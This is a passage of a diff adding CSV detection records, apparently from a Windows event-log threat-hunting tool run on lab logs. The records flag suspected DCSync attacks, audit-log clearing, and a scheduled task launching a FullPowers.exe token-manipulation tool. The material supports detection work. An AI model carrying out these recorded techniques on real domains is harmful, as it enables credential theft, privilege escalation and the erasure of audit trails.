4fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14675
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242589
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 2EA9670C-F0F9-4D3F-90E5-A087E8C05863
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14674
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.022631,2019-03-26T01:28:45.022631+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242588
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 2EA9670C-F0F9-4D3F-90E5-A087E8C05863
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14675
+
+",DC1.insecurebank.local,Security
+schedule task created,1583587059.98454,2020-03-07T17:17:39.984540+04:00,,Audit,High,schedule task created by user,4698,"
+
+
+
+
+ 4698
+ 0
+ 0
+ 12804
+ 0
+ 0x8020000000000000
+
+
+ 282588
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ \FullPowersTask
+ <?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+ <RegistrationInfo>
+ <URI>\FullPowersTask</URI>
+ </RegistrationInfo>
+ <Triggers />
+ <Principals>
+ <Principal id="Author">
+ <UserId>S-1-5-19</UserId>
+ <RunLevel>LeastPrivilege</RunLevel>
+ <RequiredPrivileges>
+ <Privilege>SeAssignPrimaryTokenPrivilege</Privilege>
+ <Privilege>SeAuditPrivilege</Privilege>
+ <Privilege>SeChangeNotifyPrivilege</Privilege>
+ <Privilege>SeCreateGlobalPrivilege</Privilege>
+ <Privilege>SeImpersonatePrivilege</Privilege>
+ <Privilege>SeIncreaseQuotaPrivilege</Privilege>
+ <Privilege>SeIncreaseWorkingSetPrivilege</Privilege>
+ </RequiredPrivileges>
+ </Principal>
+ </Principals>
+ <Settings>
+ <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+ <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
+ <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
+ <AllowHardTerminate>true</AllowHardTerminate>
+ <StartWhenAvailable>false</StartWhenAvailable>
+ <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+ <IdleSettings>
+ <Duration>PT10M</Duration>
+ <WaitTimeout>PT1H</WaitTimeout>
+ <StopOnIdleEnd>true</StopOnIdleEnd>
+ <RestartOnIdle>false</RestartOnIdle>
+ </IdleSettings>
+ <AllowStartOnDemand>true</AllowStartOnDemand>
+ <Enabled>true</Enabled>
+ <Hidden>false</Hidden>
+ <RunOnlyIfIdle>false</RunOnlyIfIdle>
+ <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>
+ <UseUnifiedSchedulingEngine>false</UseUnifiedSchedulingEngine>
+ <WakeToRun>false</WakeToRun>
+ <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
+ <Priority>7</Priority>
+ </Settings>
+ <Actions Context="Author">
+ <Exec>
+ <Command>C:\Users\Public\Tools\TokenManip\FullPowers.exe</Command>
+ <Arguments>-t 4932</Arguments>
+ </Exec>
+ </Actions>
+</Task>
+
+",MSEDGEWIN10,Security
+Audit log cleared,1651380018.084003,2022-05-01T08:40:18.084003+04:00,,Audit,Critical,Audit log cleared by user ( admin ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 21365
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+
+ S-1-5-21-482804190-775995292-3801157738-1002
+ admin
+ WIND10
+ 0x47ea55
+
+
+",wind10.winlab.local,Security
+Audit log cleared,1553038508.786016,2019-03-20T03:35:08.786016+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 452811
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x17dad
+
+
+",PC01.example.corp,Security
+Audit log cleared,1553549315.405631,2019-03-26T01:28:35.405631+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 198242566
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x8d7099
+
+
+",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242602
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)
+ %%14675
+
+",DC1.insecurebank.local,Security
+Audit log cleared,1573805956.102509,2019-11-15T12:19:16.102509+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"
+
+
+
+
+ 1102
+ 0
+ 4
+ 104
+ 0
+ 0x4020000000000000
+
+
+ 25048
+
+
+
+
+ Security
+ alice.insecurebank.local
+
+
+
+
+
+ S-1-5-21-1005675359-741490361-30848483-1108
+ bob
+ insecurebank
+ 0x1c363a4
+
+
+",alice.insecurebank.local,Security
+Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"
+
+
+
+
+ 5136
+ 0
+ 0
+ 14081
+ 0
+ 0x8020000000000000
+
+
+ 198242601
+
+
+
+
+ Security
+ DC1.insecurebank.local
+
+
+
+
+ 8E6BE6CD-81E7-4C8C-8EB0-50CA85B4950C
+ -
+ S-1-5-21-738609754-2819869699-4189121830-1108
+ bob
+ insecurebank
+ 0x40f2719
+ insecurebank.local
+ %%14676
+ DC=insecurebank,DC=local
+ C6FAF700-BFE4-452A-A766-424F84C29583
+ domainDNS
+ nTSecurityDescriptor
+ 2.5.5.15
+ O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RP